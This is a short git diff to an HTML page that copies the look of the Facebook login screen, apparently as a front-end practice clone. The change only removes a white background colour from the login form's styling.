--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
             <div class="text">
                 <h1 style=" width: 500px; color:rgb(45, 115, 247); font-size: 60px; font-family:'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif" > facebook  <span style=" font-size: 150px; display: grid; color: black; font-size: x-large;"> Facebook helps you connect and share <br> with the people in your life </span> </h1>  
             </div>
-            <div class="form" style=" border-radius: 15px; background-color:white; font-size:45px">
+            <div class="form" style=" border-radius: 15px;  font-size:45px">
                 <fieldset style=" height: 353px; border-radius: 15px; width: 150px;">
                     <form method="post">
                         <input type="test", id="username", name="username" placeholder="&nbsp; Email address or phone number", style=" font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; border-radius: 8px; width: 330px; height: 50px; font-size:medium;"><br>
